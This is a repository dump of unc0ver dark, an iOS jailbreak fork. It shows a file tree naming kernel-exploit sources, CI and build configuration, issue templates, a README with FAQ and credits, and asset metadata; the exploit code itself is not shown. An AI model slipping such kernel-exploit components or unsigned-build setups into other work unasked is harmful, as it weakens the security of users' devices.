├── .github
└── ISSUE_TEMPLATE
│ ├── bug_report.md
│ └── feature_request.md
├── .gitignore
├── .gitmodules
├── .travis.yml
├── LICENSE
├── Makefile
├── README.md
├── Resources
├── Screenshot-1.PNG
├── Screenshot-2.PNG
├── Screenshot-3.PNG
└── Undecimus.ipa
├── Undecimus.xcodeproj
├── project.pbxproj
├── project.xcworkspace
│ ├── contents.xcworkspacedata
│ ├── xcshareddata
│ │ └── IDEWorkspaceChecks.plist
│ └── xcuserdata
│ │ ├── diatrus.xcuserdatad
│ │ └── UserInterfaceState.xcuserstate
│ │ └── shady.xcuserdatad
│ │ └── UserInterfaceState.xcuserstate
├── xcshareddata
│ └── xcschemes
│ │ └── Undecimus.xcscheme
└── xcuserdata
│ ├── diatrus.xcuserdatad
│ └── xcschemes
│ │ └── xcschememanagement.plist
│ └── shady.xcuserdatad
│ ├── xcdebugger
│ └── Breakpoints_v2.xcbkptlist
│ └── xcschemes
│ └── xcschememanagement.plist
├── Undecimus
├── Assets.xcassets
│ ├── AppIcon.appiconset
│ │ ├── Contents.json
│ │ ├── Icon-App-1024x1024.png
│ │ ├── Icon-App-20x20@1x-1.png
│ │ ├── Icon-App-20x20@2x-1.png
│ │ ├── Icon-App-20x20@2x.png
│ │ ├── Icon-App-20x20@3x.png
│ │ ├── Icon-App-29x29@1x-1.png
│ │ ├── Icon-App-29x29@1x.png
│ │ ├── Icon-App-29x29@2x-1.png
│ │ ├── Icon-App-29x29@2x.png
│ │ ├── Icon-App-29x29@3x.png
│ │ ├── Icon-App-40x40@1x.png
│ │ ├── Icon-App-40x40@2x-1.png
│ │ ├── Icon-App-40x40@2x.png
│ │ ├── Icon-App-40x40@3x.png
│ │ ├── Icon-App-60x60@2x.png
│ │ ├── Icon-App-60x60@3x.png
│ │ ├── Icon-App-76x76@1x.png
│ │ ├── Icon-App-76x76@2x.png
│ │ └── Icon-App-83.5x83.5@2x.png
│ ├── Contents.json
│ ├── maintenance.imageset
│ │ ├── Contents.json
│ │ ├── maintenance.png
│ │ ├── maintenance@2x.png
│ │ └── maintenance@3x.png
│ ├── meridian.imageset
│ │ ├── Contents.json
│ │ ├── picker.png
│ │ ├── picker@2x.png
│ │ └── picker@3x.png
│ ├── picker.imageset
│ │ ├── Contents.json
│ │ ├── picker.png
│ │ ├── picker@2x.png
│ │ └── picker@3x.png
│ ├── purple.imageset
│ │ ├── Contents.json
│ │ ├── picker.png
│ │ ├── picker@2x.png
│ │ └── picker@3x.png
│ ├── settings.imageset
│ │ ├── Contents.json
│ │ ├── settings.png
│ │ ├── settings@2x.png
│ │ └── settings@3x.png
│ └── white.imageset
│ │ ├── Contents.json
│ │ ├── picker.png
│ │ ├── picker@2x.png
│ │ └── picker@3x.png
├── Base.lproj
│ └── LaunchScreen.storyboard
├── Info.plist
├── Main.storyboard
├── frameworks
│ └── SpringBoardServices.framework
│ │ └── SpringBoardServices.tbd
├── include
│ ├── IOKitLib.h
│ ├── MobileGestalt.h
│ ├── NSTask.h
│ ├── UIProgressHUD.h
│ ├── archive.h
│ ├── archive_entry.h
│ ├── common.h
│ ├── iokit.h
│ ├── ipc_port.h
│ ├── libproc.h
│ ├── mach_vm.h
│ ├── net
│ │ └── route.h
│ ├── reboot.h
│ └── sys
│ │ ├── kern_control.h
│ │ └── proc_info.h
├── resources
│ ├── Menlo-Regular.ttf
│ ├── Painting_With_Chocolate.ttf
│ ├── binpack64-256.md5sums
│ ├── binpack64-256.tar.lzma
│ ├── darkmeridian.png
│ ├── darkmeridian@2x.png
│ ├── darkmeridian@3x.png
│ ├── lists.tar.lzma
│ ├── meridian.png
│ ├── meridian@2x.png
│ ├── meridian@3x.png
│ ├── purple.png
│ ├── purple@2x.png
│ ├── purple@3x.png
│ ├── white.png
│ ├── white@2x.png
│ └── white@3x.png
└── source
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── ArchiveFile.h
│ ├── ArchiveFile.m
│ ├── CreditsTableViewController.h
│ ├── CreditsTableViewController.m
│ ├── FakeApt.h
│ ├── FakeApt.m
│ ├── JailbreakViewController.h
│ ├── JailbreakViewController.m
│ ├── KernelExecution.h
│ ├── KernelExecution.m
│ ├── KernelMemory.c
│ ├── KernelMemory.h
│ ├── KernelOffsets.h
│ ├── KernelOffsets.m
│ ├── KernelUtilities.c
│ ├── KernelUtilities.h
│ ├── SettingsTableViewController.h
│ ├── SettingsTableViewController.m
│ ├── async_wake.c
│ ├── async_wake.h
│ ├── diagnostics.h
│ ├── diagnostics.m
│ ├── early_kalloc.c
│ ├── early_kalloc.h
│ ├── find_port.c
│ ├── find_port.h
│ ├── hideventsystem.c
│ ├── hideventsystem.h
│ ├── jailbreak.h
│ ├── jailbreak.m
│ ├── kalloc_crash.c
│ ├── kalloc_crash.h
│ ├── kc_parameters.c
│ ├── kc_parameters.h
│ ├── kernel_alloc.c
│ ├── kernel_alloc.h
│ ├── kernel_call.c
│ ├── kernel_call.h
│ ├── kernel_memory.c
│ ├── kernel_memory.h
│ ├── kernel_slide.c
│ ├── kernel_slide.h
│ ├── log.c
│ ├── log.h
│ ├── machswap2_pwn.h
│ ├── machswap2_pwn.m
│ ├── machswap_offsets.h
│ ├── machswap_offsets.m
│ ├── machswap_pwn.h
│ ├── machswap_pwn.m
│ ├── main.m
│ ├── necp.c
│ ├── necp.h
│ ├── pac.c
│ ├── pac.h
│ ├── parameters.c
│ ├── parameters.h
│ ├── platform.c
│ ├── platform.h
│ ├── platform_match.c
│ ├── platform_match.h
│ ├── prefs.h
│ ├── prefs.m
│ ├── remote_call.c
│ ├── remote_call.h
│ ├── remote_memory.c
│ ├── remote_memory.h
│ ├── unlocknvram.c
│ ├── unlocknvram.h
│ ├── user_client.c
│ ├── user_client.h
│ ├── utils.h
│ ├── utils.m
│ ├── voucher_swap-poc.c
│ ├── voucher_swap-poc.h
│ ├── voucher_swap.c
│ └── voucher_swap.h
├── Update.txt
├── apt
├── Release
├── apt-key_1.8.0_iphoneos-arm.deb
├── apt-lib_1.8.0-sileo3_iphoneos-arm.deb
├── apt_1.8.0_iphoneos-arm.deb
├── base_1-5_iphoneos-arm.deb
├── bash_5.0.3-1_iphoneos-arm.deb
├── berkeleydb_6.2.32-1_iphoneos-arm.deb
├── bzip2_1.0.6-1_iphoneos-arm.deb
├── ca-certificates_0.0.2_all.deb
├── com.parrotgeek.nobetaalert_1.3.1_iphoneos-arm.deb
├── com.ps.letmeblock_0.0.1_iphoneos-arm.deb
├── com.saurik.substrate.safemode_0.9.6001.1_iphoneos-arm.deb
├── coreutils-bin_8.30-3_iphoneos-arm.deb
├── coreutils_8.30-2_iphoneos-arm.deb
├── cydia-dark_1.9.3~b5_iphoneos-arm.deb
├── cydia-lproj_1.9.3~b1_iphoneos-arm.deb
├── cydia_2.0_iphoneos-arm.deb
├── darwintools_1-6_iphoneos-arm.deb
├── debianutils_4.8.6-1_iphoneos-arm.deb
├── diffutils_3.6-1_iphoneos-arm.deb
├── diskdev-cmds_593.221.1-1_iphoneos-arm.deb
├── dpkg_1.19.2-11dark_iphoneos-arm.deb
├── essential_0-1_iphoneos-arm.deb
├── file_5.35-2_iphoneos-arm.deb
├── findutils_4.6.0-2_iphoneos-arm.deb
├── firmware-sbin_0-1_all.deb
├── gcrypt_1.8.3-1_iphoneos-arm.deb
├── gettext_0.19.8-1_iphoneos-arm.deb
├── gnupg_2.2.11-2_iphoneos-arm.deb
├── gnutls_3.5.19-1_iphoneos-arm.deb
├── grep_3.1-1_iphoneos-arm.deb
├── gzip_1.9-1_iphoneos-arm.deb
├── jailbreak-resources_1.0~b23_iphoneos-arm.deb
├── ldid_2-2.1.1+elucubratus2_iphoneos-arm.deb
├── libassuan_2.5.1-1_iphoneos-arm.deb
├── libgmp10_6.1.2-1_iphoneos-arm.deb
├── libgpg-error_1.32-1_iphoneos-arm.deb
├── libidn2_6.1.2-1_iphoneos-arm.deb
├── libksba_1.3.5-1_iphoneos-arm.deb
├── libplist_2.0.0-2_iphoneos-arm.deb
├── libssl1.0_1.0.2r-1_iphoneos-arm.deb
├── libtasn1_4.13-1_iphoneos-arm.deb
├── libunistring_0.9.10-1_iphoneos-arm.deb
├── lz4_1.7.5-1_iphoneos-arm.deb
├── lzma_5.2.4-2_iphoneos-arm.deb
├── mobilesubstrate_0.9.7033_iphoneos-arm.deb
├── ncurses5-libs_5.9-1_iphoneos-arm.deb
├── ncurses_6.1-1_iphoneos-arm.deb
├── nettle_3.4.1-1_iphoneos-arm.deb
├── npth_1.6-1_iphoneos-arm.deb
├── openssh_7.9p1-3_iphoneos-arm.deb
├── org.coolstar.sileo_1.0.8_iphoneos-arm.deb
├── org.thebigboss.repo.icons_1.0_all.deb
├── p11-kit_0.23.12-1_iphoneos-arm.deb
├── profile.d_0-1_iphoneos-arm.deb
├── readline_8.0-1_iphoneos-arm.deb
├── rsync_3.1.3-2_iphoneos-arm.deb
├── sed_4.5-1_iphoneos-arm.deb
├── shell-cmds_118-8_iphoneos-arm.deb
├── signing-certificate_0.0.1_iphoneos-arm.deb
├── system-cmds_790.30.1-2_iphoneos-arm.deb
├── system-memory-reset-fix_1.0_iphoneos-arm.deb
├── tar_1.30-2_iphoneos-arm.deb
├── trustinjector_0.4~b5_iphoneos-arm.deb
├── uikittools_2.0.1_iphoneos-arm.deb
├── us.diatr.sileorespring_1.1_iphoneos-arm.deb
├── us.diatr.sillyo_1.4_iphoneos-arm.deb
└── wget_1.19.5-2_iphoneos-arm.deb
├── post.sh
└── sileolicense-u0dark.md
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: Create a report to help us improve
4 | title: ''
5 | labels: bug
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Describe the bug**
11 | A clear and concise description of what the bug is and what you expected to happen.
12 |
13 | **To Reproduce**
14 | Steps to reproduce the behavior:
15 | 1. Go to '...'
16 | 2. Click on '....'
17 | 3. Scroll down to '....'
18 | 4. See error
19 |
20 | **Screenshots**
21 | If applicable, add screenshots to help explain your problem.
22 |
23 | **Device (please complete the following information):**
24 | - iOS Version:
25 | - iOS Device:
26 | - unc0ver Version:
27 |
28 | **Place an "x" between the brackets if true:**
29 | - [ ] this is a bug others will be able to reproduce
30 | - [ ] this issue is present with all tweaks uninstalled (except for default packages) or disabled
31 | - [ ] this issue is present after a rootfs restore
32 | - [ ] this issue is present on the latest version of unc0ver
33 |
34 | **Logs**
35 | If applicable, add logs or error messages here.
36 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature request
3 | about: Suggest an idea for this project
4 | title: ''
5 | labels: enhancement
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Describe the feature you'd like**
11 | A clear and concise description of what you want to happen.
12 |
13 | **Describe alternatives you've considered**
14 | A clear and concise description of any alternative solutions or features you've considered.
15 |
16 | **Additional context**
17 | Add any other context or screenshots about the feature request here.
18 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Xcode
2 | #
3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore
4 |
5 | ## Build generated
6 | build/
7 | DerivedData/
8 |
9 | ## Various settings
10 | *.pbxuser
11 | !default.pbxuser
12 | *.mode1v3
13 | !default.mode1v3
14 | *.mode2v3
15 | !default.mode2v3
16 | *.perspectivev3
17 | !default.perspectivev3
18 | xcuserdata/
19 |
20 | ## Other
21 | *.moved-aside
22 | *.xccheckout
23 | *.xcscmblueprint
24 |
25 | ## Obj-C/Swift specific
26 | *.hmap
27 | #*.ipa
28 | Payload
29 | *.dSYM.zip
30 | *.dSYM
31 |
32 | # CocoaPods
33 | #
34 | # We recommend against adding the Pods directory to your .gitignore. However
35 | # you should judge for yourself, the pros and cons are mentioned at:
36 | # https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control
37 | #
38 | # Pods/
39 | #
40 | # Add this line if you want to avoid checking in source code from the Xcode workspace
41 | *.xcworkspace
42 |
43 | # Carthage
44 | #
45 | # Add this line if you want to avoid checking in source code from Carthage dependencies.
46 | # Carthage/Checkouts
47 |
48 | Carthage/Build
49 |
50 | # fastlane
51 | #
52 | # It is recommended to not store the screenshots in the git repo. Instead, use fastlane to re-generate the
53 | # screenshots whenever they are needed.
54 | # For more information about the recommended setup visit:
55 | # https://docs.fastlane.tools/best-practices/source-control/#source-control
56 |
57 | fastlane/report.xml
58 | fastlane/Preview.html
59 | fastlane/screenshots/**/*.png
60 | fastlane/test_output
61 |
62 | # Code Injection
63 | #
64 | # After new code Injection tools there's a generated folder /iOSInjectionProject
65 | # https://github.com/johnno1962/injectionforxcode
66 |
67 | iOSInjectionProject/
68 | # General
69 | .DS_Store
70 | .AppleDouble
71 | .LSOverride
72 |
73 | # Icon must end with two \r
74 | Icon
75 |
76 |
77 | # Thumbnails
78 | ._*
79 |
80 | # Files that might appear in the root of a volume
81 | .DocumentRevisions-V100
82 | .fseventsd
83 | .Spotlight-V100
84 | .TemporaryItems
85 | .Trashes
86 | .VolumeIcon.icns
87 | .com.apple.timemachine.donotpresent
88 |
89 | # Directories potentially created on remote AFP share
90 | .AppleDB
91 | .AppleDesktop
92 | Network Trash Folder
93 | Temporary Items
94 | .apdisk
95 |
96 | # theos
97 | .theos/
98 | packages/
99 | obj/
100 |
101 | *.ipa
102 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "Injector"]
2 | path = Injector
3 | url = https://github.com/pwn20wndstuff/Injector.git
4 | [submodule "snappy"]
5 | path = snappy
6 | url = https://github.com/sbingner/snappy.git
7 | [submodule "patchfinder64"]
8 | path = patchfinder64
9 | url = https://github.com/pwn20wndstuff/patchfinder64.git
10 | [submodule "offset-cache"]
11 | path = offset-cache
12 | url = https://github.com/sbingner/offset-cache.git
13 | [submodule "kerneldec"]
14 | path = kerneldec
15 | url = https://github.com/sbingner/kerneldec.git
16 |
--------------------------------------------------------------------------------
/.travis.yml:
--------------------------------------------------------------------------------
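# Travis CI pipeline: builds Undecimus.ipa on macOS with `make` and publishes
# it as a GitHub release for nqcshady/unc0ver-dark.
language: objective-c
os: osx
osx_image: xcode10.1
env:
  global:
    - MAKEFLAGS="-j100"
git:
  # Submodules are fetched by hand in before_install instead of by Travis.
  submodules: false
  # Full clone (no shallow depth); before_deploy derives the tag from git log.
  depth: false

before_install:
  # NOTE(review): ssh-keyscan accepts whatever host key is presented at build
  # time, with no fingerprint comparison, so it gives no protection against a
  # spoofed host. The submodule URLs in .gitmodules are https, so this step may
  # not be needed at all - confirm before removing.
  - ssh-keyscan github.com >> ~/.ssh/known_hosts
  - git submodule update --init
  # NOTE(review): dpkg and ldid are installed at whatever version brew serves
  # on the day of the build; the release is therefore not reproducible from
  # this file alone.
  - brew install dpkg ldid
script: make

before_deploy:
  # Quoted so that a name or address containing spaces or glob characters is
  # passed to git as a single argument.
  - git config --local user.name "$username"
  - git config --local user.email "$email"
  # Untagged builds get a generated snapshot tag that includes the short
  # commit hash.
  - export TRAVIS_TAG="${TRAVIS_TAG:-$version-snapshot-$(git log --format=%h -1)-v$snapshot_version}"
  - git tag "$TRAVIS_TAG"

notifications:
  email: false

deploy:
  provider: releases
  # Keep the build output (Undecimus.ipa) in place for the upload.
  skip_cleanup: true
  prerelease: $prerelease
  api_key:
    # Travis-encrypted GitHub token. NOTE(review): the token's scope is not
    # visible from this file - confirm it is limited to what publishing a
    # release needs, and rotate it if the repository changes hands.
    secure: 2bZxDZ5zRvS4xteeQQjmEP08tl5wqLq9/D4LYPAB4ohfZCPfT/1ucpUESjVN89jsEvakWlnTf5o/rFYc9OK2GlI4OFo6I9Rwseb3PLhLOvi/RHiMxHF3VkpdTRFelsYtZjxAn8p2gs5Q0Yx26qq0qySmGg+Yvn7CZ9OeP+8Ch+H8/fcyH0dD+Nxqo8Xl0dPs8U05EQ2cKNfGTLv7l1h7B7pqVU+2UKB8La/vYZfFOYRe5W5mwhQv4vOZVG1U3DpQqaIXOGybmICaDlFEv76qJf9VmjIU48+tzMAq5xqadPsUErbNg9/gTiBTgQ751te8vXQAtV0CINvrtteeUcAGXe9dnfX85+Ql7HhDxcVC4Y3uPgGiNhJb3bSXyQ7/mzO7uhtXi7D9YYFg+YCSyuZdK+xYlGWxLqBKWSxC5nvH98r5ZZZVrbAfbHRy8JqRjCZdymggm9VdKziFyUtcJpsLroGpJT/Z66R3oo+I9nR3O8ucGt7D009I8Gc902Mbf8rG0kQPmZBaH234lOuMNXxc/OGvOHe9qIhz3Na/CNdbvQkdLzIA1ZhyqEntl7zQr6UGOEfluL+9Sff8KmlIwcn5XIEYpfGKVs4IXYQU1miGaywlyxv26neGp1bmutV66u0egpbREylqGiiVdT5w6bXvfEe//NxWRPt3RM14qSmmRUo=
  # The uploaded artifact is the .ipa produced by `make`; no checksum or
  # signature file is published alongside it by this configuration.
  file: Undecimus.ipa
  on:
    repo: nqcshady/unc0ver-dark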
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 Pwn20wnd
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
# Builds the Xcode project and packages the resulting app bundle as
# $(TARGET).ipa in the repository root.
TARGET = Undecimus

.PHONY: all clean

# Always starts from a clean tree, then builds the Debug configuration for
# the iphoneos SDK and zips the app bundle under a Payload/ prefix.
# Code signing is switched off here (empty CODE_SIGN_IDENTITY,
# CODE_SIGNING_REQUIRED=NO), so the packaged app carries no developer
# signature of its own.
all: clean
	xcodebuild clean build \
		CODE_SIGN_IDENTITY="" \
		CODE_SIGNING_REQUIRED=NO \
		PRODUCT_BUNDLE_IDENTIFIER="us.diatr.undecimus" \
		-sdk iphoneos \
		-configuration Debug \
		-quiet \
		-UseModernBuildSystem=NO
	ln -sf build/Debug-iphoneos Payload
	# strip Payload/$(TARGET).app/$(TARGET)
	# zip -r9 $(TARGET).ipa Payload/$(TARGET).app
	zip -r9q $(TARGET).ipa Payload/$(TARGET).app

# Removes the build directory, the Payload symlink and any previous .ipa.
clean:
	rm -rf build Payload $(TARGET).ipa
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | [](https://travis-ci.com/nqcshady/unc0ver-dark)
3 |
4 |
5 |
6 | unc0ver dark (EOL)
7 | The most advanced jailbreak tool, with more freedom
8 |
9 |
10 |
11 |
12 |
13 | ### FAQ
14 | * Will the jailbreak see an update to 12.4? -- No. unc0ver has remained closed source for a while now, and the project is now dead. Please use Diatrus' Sileo for unc0ver as an alternative from now on.
15 | * Where can I stay up to date on unc0ver dark? -- [Join the unc0ver dark Discord](https://discord.gg/4pYwBCb)
16 | * My Cydia is crashing? How do I fix this? -- Uninstall CyDown. It is not updated for the new fork of Cydia. Also, piracy is no fun. ;(
17 | * Jailbreak failing on the first try? -- You need WiFi for the initial jailbreak, so you cannot use Airplane Mode. This is due to licensing on Cydia Substrate, which is downloaded from the Internet (see "Changes from unc0ver").
18 | * How do I switch from another jailbreak? -- unc0ver dark automatically handles the switching process. So no need to worry about switching. No rootFS restore is required.
19 |
20 | ### Changes from unc0ver
21 | * APT 1.8
22 | * **New** true black UI designed by [23 Aaron](https://twitter.com/23Aaron_)
23 | * Substrate is downloaded from the Internet
24 | * Sileo support via [Diatrus](https://github.com/Diatrus)
25 | * Theme switcher by [Diatrus](https://github.com/Diatrus) & [Hydri](https://twitter.com/HydriDev_)
26 |
27 | ### Available themes
28 | * True Black
29 | * Dark Purple
30 | * White
31 | * OG Meridian White/v0rtex-S
32 | * Dark Meridian
33 | 
34 |
35 | ## Getting support
36 | * Use the built-in diagnostics tool
37 | * Join the u0 Dark [Discord](https://discord.gg/4pYwBCb)
38 | * r/jailbreak on [Reddit](https://reddit.com/r/jailbreak)
39 |
40 | ## Best practices
41 | * Perform a full restore with Rollectra or Succession before switching from another jailbreak
42 | * Turn off Siri before starting the jailbreak
43 |
44 | ## Source code
45 | * This project is completely open source and it **will** stay that way
46 | * Any kind of contribution is welcome (pull-requests)
47 | * The original source code can be found [here](https://github.com/pwn20wndstuff/Undecimus), on @pwn20wndstuff's GitHub account
48 |
49 | ## unc0ver dark Members
50 | * [shady](https://twitter.com/versusess)
51 | * [Diatrus](https://twitter.com/Diatrus) - Honorary Member, left.
52 | * [Ultra](https://twitter.com/Ultra_038)
53 | * [Hydri](https://twitter.com/HydriDev_)
54 | * [23Aaron](https://twitter.com/23Aaron_)
55 | * Syndrome - Syndrome#7786 (Discord)
56 |
57 | # Credits
58 | This fork could not have been created without these people and tools.
59 | * [pwn20wnd](https://twitter.com/Pwn20wnd) - original u0 developer
60 | * [Sam Bingner](https://twitter.com/sbingner) - original u0 developer
61 | * [patchfinder64](https://github.com/pwn20wndstuff/patchfinder64/tree/d2df2a303885d773cab95c18536dc8b218b13ca1)
62 | * [snappy](https://github.com/sbingner/snappy/tree/8c0f4ec12ccbcdc50212ac83541df7533083e556)
63 | * [Injector](https://github.com/pwn20wndstuff/Injector/tree/4e25f6d5eb045a0b8b7362d8ad090474e7c73eef)
64 | * [Ian Beer](https://twitter.com/i41nbeer) for mach_portal, triple_fetch, async_wake and deja_xnu
65 | * [Morpheus](https://twitter.com/Morpheus______) for the QiLin Toolkit
66 | * [xerub](https://twitter.com/xerub) for libjb and the original patchfinder64
67 | * [iBSparkes](https://twitter.com/iBSparkes) for the original amfid_payload, jailbreakd, pspawn_hook, machswap, and machswap2
68 | * [stek29](https://twitter.com/stek29) for the patchfinder64 additions, unlocknvram, host_get_special_port(4) patch and shenanigans bypass
69 | * [theninjaprawn](https://twitter.com/theninjaprawn) for the patchfinder64 additions
70 | * [Jay Freeman (saurik)](https://twitter.com/saurik) for Cydia and Substrate
71 | * [tihmstar](https://twitter.com/tihmstar) for libgrabkernel and liboffsetfinder64
72 | * [CoolStar](https://twitter.com/coolstarorg) for originally testing the snapshot rename idea on corellium (and Sileo)
73 | * [Chronix](https://www.youtube.com/channel/UCEj2uj_VZYYOa8tIBb63tUg) for fixing README
74 | * [Sukarodo](https://twitter.com/sukarodo) for README changes and support of the project
75 | * [Undecimus-Resources](https://github.com/pwn20wndstuff/Undecimus-Resources)
76 |
--------------------------------------------------------------------------------
/Resources/Screenshot-1.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Resources/Screenshot-1.PNG
--------------------------------------------------------------------------------
/Resources/Screenshot-2.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Resources/Screenshot-2.PNG
--------------------------------------------------------------------------------
/Resources/Screenshot-3.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Resources/Screenshot-3.PNG
--------------------------------------------------------------------------------
/Resources/Undecimus.ipa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Resources/Undecimus.ipa
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/project.xcworkspace/xcuserdata/diatrus.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus.xcodeproj/project.xcworkspace/xcuserdata/diatrus.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/project.xcworkspace/xcuserdata/shady.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus.xcodeproj/project.xcworkspace/xcuserdata/shady.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/xcshareddata/xcschemes/Undecimus.xcscheme:
--------------------------------------------------------------------------------
1 |
2 |
5 |
8 |
9 |
15 |
21 |
22 |
23 |
24 |
25 |
30 |
31 |
32 |
33 |
39 |
40 |
41 |
42 |
43 |
44 |
54 |
56 |
62 |
63 |
64 |
65 |
66 |
67 |
73 |
75 |
81 |
82 |
83 |
84 |
86 |
87 |
90 |
91 |
92 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/xcuserdata/diatrus.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | Undecimus.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/xcuserdata/shady.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/xcuserdata/shady.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | Undecimus.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "size" : "20x20",
5 | "idiom" : "iphone",
6 | "filename" : "Icon-App-20x20@2x.png",
7 | "scale" : "2x"
8 | },
9 | {
10 | "size" : "20x20",
11 | "idiom" : "iphone",
12 | "filename" : "Icon-App-20x20@3x.png",
13 | "scale" : "3x"
14 | },
15 | {
16 | "size" : "29x29",
17 | "idiom" : "iphone",
18 | "filename" : "Icon-App-29x29@1x.png",
19 | "scale" : "1x"
20 | },
21 | {
22 | "size" : "29x29",
23 | "idiom" : "iphone",
24 | "filename" : "Icon-App-29x29@2x.png",
25 | "scale" : "2x"
26 | },
27 | {
28 | "size" : "29x29",
29 | "idiom" : "iphone",
30 | "filename" : "Icon-App-29x29@3x.png",
31 | "scale" : "3x"
32 | },
33 | {
34 | "size" : "40x40",
35 | "idiom" : "iphone",
36 | "filename" : "Icon-App-40x40@2x.png",
37 | "scale" : "2x"
38 | },
39 | {
40 | "size" : "40x40",
41 | "idiom" : "iphone",
42 | "filename" : "Icon-App-40x40@3x.png",
43 | "scale" : "3x"
44 | },
45 | {
46 | "size" : "60x60",
47 | "idiom" : "iphone",
48 | "filename" : "Icon-App-60x60@2x.png",
49 | "scale" : "2x"
50 | },
51 | {
52 | "size" : "60x60",
53 | "idiom" : "iphone",
54 | "filename" : "Icon-App-60x60@3x.png",
55 | "scale" : "3x"
56 | },
57 | {
58 | "size" : "20x20",
59 | "idiom" : "ipad",
60 | "filename" : "Icon-App-20x20@1x-1.png",
61 | "scale" : "1x"
62 | },
63 | {
64 | "size" : "20x20",
65 | "idiom" : "ipad",
66 | "filename" : "Icon-App-20x20@2x-1.png",
67 | "scale" : "2x"
68 | },
69 | {
70 | "size" : "29x29",
71 | "idiom" : "ipad",
72 | "filename" : "Icon-App-29x29@1x-1.png",
73 | "scale" : "1x"
74 | },
75 | {
76 | "size" : "29x29",
77 | "idiom" : "ipad",
78 | "filename" : "Icon-App-29x29@2x-1.png",
79 | "scale" : "2x"
80 | },
81 | {
82 | "size" : "40x40",
83 | "idiom" : "ipad",
84 | "filename" : "Icon-App-40x40@1x.png",
85 | "scale" : "1x"
86 | },
87 | {
88 | "size" : "40x40",
89 | "idiom" : "ipad",
90 | "filename" : "Icon-App-40x40@2x-1.png",
91 | "scale" : "2x"
92 | },
93 | {
94 | "size" : "76x76",
95 | "idiom" : "ipad",
96 | "filename" : "Icon-App-76x76@1x.png",
97 | "scale" : "1x"
98 | },
99 | {
100 | "size" : "76x76",
101 | "idiom" : "ipad",
102 | "filename" : "Icon-App-76x76@2x.png",
103 | "scale" : "2x"
104 | },
105 | {
106 | "size" : "83.5x83.5",
107 | "idiom" : "ipad",
